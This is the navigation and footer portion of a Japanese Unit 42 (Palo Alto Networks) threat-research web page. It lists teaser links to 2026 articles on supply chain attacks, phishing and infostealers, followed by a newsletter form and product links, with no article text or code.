  ![Pictorial representation of TeamPCP. Glowing code on a screen where several word such as Crime, Hackers, and Security are highlighted in a contrasting color.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/03/03_Cybercrime_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年3月31日 [#### プロテクターを武器として利用する:セキュリティ インフラにおけるTeamPCPの多段階サプライ チェーン攻撃](https://unit42.paloaltonetworks.com/ja/teampcp-supply-chain-attacks/)

* [CVE-2025-55182](https://unit42.paloaltonetworks.com/ja/tag/cve-2025-55182-ja/ "CVE-2025-55182")

* [GitHub](https://unit42.paloaltonetworks.com/ja/tag/github-ja/ "GitHub")

* [Infostealer](https://unit42.paloaltonetworks.com/ja/tag/infostealer-ja/ "Infostealer")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/teampcp-supply-chain-attacks/ "プロテクターを武器として利用する:セキュリティ インフラにおけるTeamPCPの多段階サプライ チェーン攻撃")  
  ![Pictorial representation of phishing campaign. A blurred image focusing on a person typing on a laptop with lines of code visible on the screen, illuminated in blue and red lights, suggestive of intense coding or cyber activities.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/03/06_Malware_Category_1920x900-3-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)脅威リサーチ](https://unit42.paloaltonetworks.com/ja/category/threat-research-ja/) 2026年3月24日 [#### 脅威情報: パロアルトネットワークスの人材獲得チームになりすました採用スキーム](https://unit42.paloaltonetworks.com/ja/phishing-attackers-pose-as-panw-recruiters/)

* [Email scam](https://unit42.paloaltonetworks.com/ja/tag/email-scam/ "email scam")

* [Lure](https://unit42.paloaltonetworks.com/ja/tag/lure/ "lure")

* [Phishing](https://unit42.paloaltonetworks.com/ja/tag/phishing-ja/ "phishing")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/phishing-attackers-pose-as-panw-recruiters/ "脅威情報: パロアルトネットワークスの人材獲得チームになりすました採用スキーム")  
  ![Pictorial representation of Notepad++ supply chain compromise. A digital rendering of Earth from space, focusing on North and South America. The continents are illuminated in blue, with red lines and dots indicating data connections across various locations. Dark background highlights the vibrant network representation.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/02/11_Security-Technology_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年2月11日 [#### 国家支援型の脅威アクターがNotepad++のサプライチェーンを悪用](https://unit42.paloaltonetworks.com/ja/notepad-infrastructure-compromise/)

* [Backdoor](https://unit42.paloaltonetworks.com/ja/tag/backdoor-ja/ "backdoor")

* [Cobalt Strike](https://unit42.paloaltonetworks.com/ja/tag/cobalt-strike-ja/ "Cobalt Strike")

* [DLL Sideloading](https://unit42.paloaltonetworks.com/ja/tag/dll-sideloading-ja/ "DLL Sideloading")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/notepad-infrastructure-compromise/ "国家支援型の脅威アクターがNotepad++のサプライチェーンを悪用")  
  ![Pictorial representation of runtime assembly attacks. Digital artwork of a glowing, futuristic shield disintegrating into small particles, set against a dark blue, bokeh-effect background.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/01/09_Business_email_compromise_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)脅威リサーチ](https://unit42.paloaltonetworks.com/ja/category/threat-research-ja/) 2026年1月22日 [#### ランタイムアセンブリ攻撃の新たなフロンティア：LLMを活用したフィッシング用JavaScriptのリアルタイム生成](https://unit42.paloaltonetworks.com/ja/real-time-malicious-javascript-through-llms/)

* [API](https://unit42.paloaltonetworks.com/ja/tag/api-ja/ "API")

* [Google](https://unit42.paloaltonetworks.com/ja/tag/google-ja/ "Google")

* [JavaScript](https://unit42.paloaltonetworks.com/ja/tag/javascript-ja/ "JavaScript")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/real-time-malicious-javascript-through-llms/ "ランタイムアセンブリ攻撃の新たなフロンティア：LLMを活用したフィッシング用JavaScriptのリアルタイム生成")  
  ![Pictorial representation of SLOW#TEMPEST campaign. Digital artwork depicting a malware alert symbol on a computer screen, with background of blurred programming code in blue and red colors.](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/07/07_Malware_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)脅威リサーチ](https://unit42.paloaltonetworks.com/ja/category/threat-research-ja/) 2026年1月2日 [#### Pyarmorを利用して難読化と検知回避を行うVVS Discord Stealer](https://unit42.paloaltonetworks.com/ja/vvs-stealer/)

* [Discord](https://unit42.paloaltonetworks.com/ja/tag/discord/ "Discord")

* [Infostealer](https://unit42.paloaltonetworks.com/ja/tag/infostealer-ja/ "Infostealer")

* [Python](https://unit42.paloaltonetworks.com/ja/tag/python-ja/ "Python")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/vvs-stealer/ "Pyarmorを利用して難読化と検知回避を行うVVS Discord Stealer")

* ![Slider arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/slider-arrow-left.svg)

* ![Slider arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/slider-arrow-left.svg)  
  ![Close button](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/close-modal.svg) ![Enlarged Image]()  
  ![Newsletter](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/04/Unit-42_get-updates-banner.png)  
  ![UNIT 42 Small Logo](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/palo-alto-logo-small.svg) Unit 42 からの最新情報を取得

## 進化する脅威の状況を常に先取り

メール アドレス

本フォームを送信することにより、[利用規約](https://www.paloaltonetworks.jp/legal-notices/terms-of-use)に同意し、[プライバシー ポリシー](https://www.paloaltonetworks.jp/legal-notices/privacy)を承認したことになります。

本サイトは reCAPTCHA で保護されており、Googleの[プライバシー ポリシー](https://policies.google.com/privacy) と[サービス利用規約](https://policies.google.com/terms)が適用されます。

Invalid captcha!
サブスクライブ ![Right Arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/right-arrow.svg) ![loader](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-loader.svg)  
{#footer} 製品とサービス

* [AI利用ネットワーク セキュリティ プラットフォーム](https://www.paloaltonetworks.jp/network-security)

* [AIのセキュア バイ デザイン](https://www.paloaltonetworks.jp/precision-ai-security/secure-ai-by-design)

* [Prisma AIRS](https://www.paloaltonetworks.jp/prisma/prisma-ai-runtime-security)

* [AI Access Security](https://www.paloaltonetworks.jp/sase/ai-access-security)

* [クラウド提供型セキュリティ サービス](https://www.paloaltonetworks.jp/network-security/security-subscriptions)

* [Advanced Threat Prevention](https://www.paloaltonetworks.jp/network-security/advanced-threat-prevention)

* [Advanced URL Filtering](https://www.paloaltonetworks.jp/network-security/advanced-url-filtering)

* [Advanced WildFire](https://www.paloaltonetworks.jp/network-security/advanced-wildfire)

* [Advanced DNS Security](https://www.paloaltonetworks.jp/network-security/advanced-dns-security)

* [Enterprise Data Loss Prevention](https://www.paloaltonetworks.jp/sase/enterprise-data-loss-prevention)

* [Enterprise IoT Security](https://www.paloaltonetworks.jp/content/pan/ja_JP/network-security/enterprise-iot-security)

* [Medical IoT Security](https://www.paloaltonetworks.jp/network-security/medical-device-security)

* [Industrial OT Security](https://www.paloaltonetworks.jp/content/pan/ja_JP/network-security/industrial-ot-security)

* [SaaS Security](https://www.paloaltonetworks.jp/sase/saas-security)

* [次世代ファイアウォール](https://www.paloaltonetworks.jp/network-security/next-generation-firewall)

* [ハードウェア ファイアウォール](https://www.paloaltonetworks.jp/network-security/hardware-firewall-innovations)

* [ソフトウェア ファイアウォール](https://www.paloaltonetworks.jp/network-security/software-firewalls)

* [Strata Cloud Manager](https://www.paloaltonetworks.jp/network-security/strata-cloud-manager)

* [SD-WAN for NGFW](https://www.paloaltonetworks.jp/network-security/sd-wan-subscription)

* [PAN-OS](https://www.paloaltonetworks.jp/network-security/pan-os)

* [Panorama](https://www.paloaltonetworks.jp/network-security/panorama)

* [セキュア アクセス サービス エッジ](https://www.paloaltonetworks.jp/sase)

* [Prisma SASE](https://www.paloaltonetworks.jp/sase)

* [App Acceleration](https://www.paloaltonetworks.jp/sase/app-acceleration)

* [自律型デジタルエクスペリエンス管理](https://www.paloaltonetworks.jp/sase/adem)

* [Enterprise DLP](https://www.paloaltonetworks.jp/sase/enterprise-data-loss-prevention)

* [Prisma Access](https://www.paloaltonetworks.jp/sase/access)

* [Prisma Browser](https://www.paloaltonetworks.jp/sase/prisma-browser)

* [Prisma SD-WAN](https://www.paloaltonetworks.jp/sase/sd-wan)

* [リモート ブラウザ分離](https://www.paloaltonetworks.jp/sase/remote-browser-isolation)

* [SaaS Security](https://www.paloaltonetworks.jp/sase/saas-security)

* [AI駆動型セキュリティ運用プラットフォーム](https://www.paloaltonetworks.jp/cortex)

* [Cloud Security](https://www.paloaltonetworks.jp/cortex/cloud)

* [Cortex Cloud](https://www.paloaltonetworks.jp/cortex/cloud)

* [Application Security](https://www.paloaltonetworks.jp/cortex/cloud/application-security)

* [Cloud Posture Security](https://www.paloaltonetworks.jp/cortex/cloud/cloud-posture-security)

* [Cloud Runtime Security](https://www.paloaltonetworks.jp/cortex/cloud/runtime-security)

* [Prisma Cloud](https://www.paloaltonetworks.jp/prisma/cloud)

* [AI駆動型SOC](https://www.paloaltonetworks.jp/cortex)

* [Cortex XSIAM](https://www.paloaltonetworks.jp/cortex/cortex-xsiam)

* [Cortex XDR](https://www.paloaltonetworks.jp/cortex/cortex-xdr)

* [Cortex XSOAR](https://www.paloaltonetworks.jp/cortex/cortex-xsoar)

* [Cortex Xpanse](https://www.paloaltonetworks.jp/cortex/cortex-xpanse)

* [Unit 42マネージド ディテクション\&レスポンス](https://www.paloaltonetworks.jp/cortex/managed-detection-and-response)

* [マネージドXSIAM](https://www.paloaltonetworks.jp/cortex/managed-xsiam)

* [次世代のアイデンティティ セキュリティ](https://www.paloaltonetworks.jp/idira)

* [特権アクセス管理](https://www.paloaltonetworks.jp/idira/human/privileged-access-management)

* [アイデンティティ管理とアクセス管理](https://www.paloaltonetworks.jp/idira/human/identity-and-access-management)

* [Endpoint Privilege Manager](https://www.paloaltonetworks.jp/idira/human/endpoint-privilege-manager)

* [アイデンティティ ガバナンス](https://www.paloaltonetworks.jp/idira/human/identity-governance)

* [従業員パスワード管理](https://www.paloaltonetworks.jp/idira/human/workforce-password-management)

* [エージェンティック アイデンティティ](https://www.paloaltonetworks.jp/idira/agentic)

* [シークレット管理](https://www.paloaltonetworks.jp/idira/machine/secrets-management)

* [統合型シークレット ガバナンス](https://www.paloaltonetworks.jp/idira/machine/unified-secrets-governance)

* [アプリケーションの認証情報配信](https://www.paloaltonetworks.jp/idira/machine/application-credentials-delivery)

* [ベンダーの特権アクセス](https://www.paloaltonetworks.jp/idira/human/vendor-privileged-access)

* [脅威インテリジェンス\&インシデント レスポンス サービス](https://www.paloaltonetworks.jp/unit42)

* [予防評価](https://www.paloaltonetworks.jp/unit42/assess)

* [インシデント レスポンス](https://www.paloaltonetworks.jp/unit42/respond)

* [セキュリティ戦略を変革](https://www.paloaltonetworks.jp/unit42/transform)

* [脅威インテリジェンスについて](https://www.paloaltonetworks.jp/unit42/threat-intelligence-partners)  
  会社名

* [パロアルトネットワークスについて](https://www.paloaltonetworks.jp/about-us)

* [採用情報](https://jobs.paloaltonetworks.com/en/)

* [お問合せ](https://www.paloaltonetworks.jp/company/contact-sales)

* [企業責任](https://www.paloaltonetworks.com/about-us/corporate-responsibility)

* [お客様向け](https://www.paloaltonetworks.jp/customers)

* [IR](https://investors.paloaltonetworks.com/)

* [拠点](https://www.paloaltonetworks.com/about-us/locations)

* [ニュースルーム](https://www.paloaltonetworks.jp/company/newsroom)  
  人気のあるリンク

* [ブログ](https://www.paloaltonetworks.com/blog/?lang=ja)

* [コミュニティ](https://www.paloaltonetworks.com/communities)

* [コンテンツライブラリ](https://www.paloaltonetworks.jp/resources)

* [Cyberpedia](https://www.paloaltonetworks.jp/cyberpedia)

* [イベントセンター](https://events.paloaltonetworks.com/)

* [電子メール設定の管理](https://start.paloaltonetworks.com/preference-center)

* [製品A〜Z](https://www.paloaltonetworks.jp/products/products-a-z)

* [製品認証](https://www.paloaltonetworks.com/legal-notices/trust-center/compliance)

* [脆弱性の報告](https://www.paloaltonetworks.com/security-disclosure)

* [サイトマップ](https://www.paloaltonetworks.jp/sitemap)

* [テクニカル ドキュメント](https://docs.paloaltonetworks.com/)

* [Unit 42](https://unit42.paloaltonetworks.jp/)

* [個人情報の販売および共有禁止](https://panwedd.exterro.net/portal/dsar.htm?target=panwedd)
  ![Palo Alto Networks Logo](https://www.paloaltonetworks.jp/etc/clientlibs/clean/imgs/pan-logo-dark.svg)

* [プライバシー](https://www.paloaltonetworks.jp/legal-notices/privacy)

* [トラスト センター](https://www.paloaltonetworks.jp/legal-notices/trust-center)

* [利用規約](https://www.paloaltonetworks.jp/legal-notices/terms-of-use)

* [ドキュメント](https://www.paloaltonetworks.jp/legal-notices)

Copyright © 2026 Palo Alto Networks. All Rights Reserved

* [![](https://www.paloaltonetworks.jp/etc/clientlibs/clean/imgs/social/youtube-black.svg)](https://www.youtube.com/user/paloaltonetworks)
* [![](https://www.paloaltonetworks.jp/etc/clientlibs/clean/imgs/social/twitter-x-black.svg)](https://twitter.com/PaloAltoNtwks)
* [![](https://www.paloaltonetworks.jp/etc/clientlibs/clean/imgs/social/facebook-black.svg)](https://www.facebook.com/PaloAltoNetworks/)
* [![](https://www.paloaltonetworks.jp/etc/clientlibs/clean/imgs/social/linkedin-black.svg)](https://www.linkedin.com/company/palo-alto-networks)
* [![](https://www.paloaltonetworks.jp/content/dam/pan/en_US/images/icons/podcast.svg)](https://unit42.paloaltonetworks.com/unit-42-threat-vector-podcast/)
* JP  
  Select your language  
  ![Play](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-play-icon.svg) ![Pause](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-pause-icon1.svg) ![Minimize](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-minimize.svg) ![Close button](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/close-modal.svg)

### Default Heading

Read the article ![Right Arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/right-arrow.svg)  
Seekbar

![Play](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-play-icon.svg) ![Pause](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-pause-icon1.svg)  
![Volume](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-volume.svg)  
Volume
![Minimize](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-minimize.svg)
